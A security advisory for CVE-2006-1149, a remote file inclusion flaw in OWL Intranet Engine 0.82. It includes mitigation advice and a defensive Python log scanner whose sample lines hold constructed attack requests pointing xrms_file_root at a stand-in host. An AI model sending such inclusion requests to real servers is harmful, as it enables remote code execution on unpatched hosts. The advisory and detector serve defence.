PT-2006-2176 · Owl · Owl Intranet Engine

Rgod · Published 2006-03-10 · Updated 2017-10-19 · CVE-2006-1149

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

OWL Intranet Engine version 0.82

Description

The issue allows remote attackers to include arbitrary files via a URL in the xrms_file_root parameter, which is not initialized before use, when register_globals is enabled. Exploitation consists of supplying a malicious URL as the value of the xrms_file_root parameter.

Recommendations

For OWL Intranet Engine version 0.82, consider disabling the register_globals setting to prevent exploitation. Additionally, restrict access to the lib/OWL_API.php file to minimize the risk of arbitrary file inclusion. Avoid using the xrms_file_root parameter until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
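
Since no fixed version is known, reviewing web access logs for the pattern in the description is a practical check. The following is an added example, not code from this advisory or from the Owl project: it flags logged requests to the script named above in which the parameter named above (written with underscores, lib/OWL_API.php and xrms_file_root) carries a URL. The combined log format, the /owl/ path prefix and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of an Apache/Nginx "combined" access-log entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Value that begins with a URL scheme (http://, ftp://, ...).
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)
SCRIPT = "lib/owl_api.php"   # compared against the lower-cased request path
PARAM = "xrms_file_root"     # PHP variable names are case-sensitive


def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_line(line):
    """Return a finding dict when a request sets xrms_file_root to a URL, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if SCRIPT not in fully_unquote(parts.path).lower():
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_unquote(value)
        if name == PARAM and SCHEME_RE.match(value):
            return {"ip": m["ip"], "status": int(m["status"]), "value": value}
    return None


def scan(lines):
    """Collect findings for every flagged line."""
    return [hit for hit in map(flag_line, lines) if hit]


# Constructed sample lines (documentation IP ranges, example host, assumed /owl/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2006:10:00:00 +0000] "GET /owl/browse.php?parent=1 HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [10/Mar/2006:10:00:05 +0000] "GET /owl/lib/OWL_API.php?xrms_file_root=http%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 90 "-" "-"',
    '198.51.100.7 - - [10/Mar/2006:10:00:09 +0000] "GET /owl/lib/OWL_API.php?xrms_file_root=FTP%253A%252F%252Fhost.example%252Fx HTTP/1.0" 200 90 "-" "-"',
    '192.0.2.11 - - [10/Mar/2006:10:00:12 +0000] "GET /owl/lib/OWL_API.php?xrms_file_root=/var/www/xrms HTTP/1.1" 200 90 "-" "-"',
]
```

Access logs record only the query string; with register_globals enabled the same variable can also arrive in a POST body or a cookie, which this scan cannot see. A hit with status 200 on a host that still has register_globals enabled warrants checking the server for unexpected outbound connections at the same timestamp.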


Related Identifiers

CVE-2006-1149

Affected Products

Owl Intranet Engine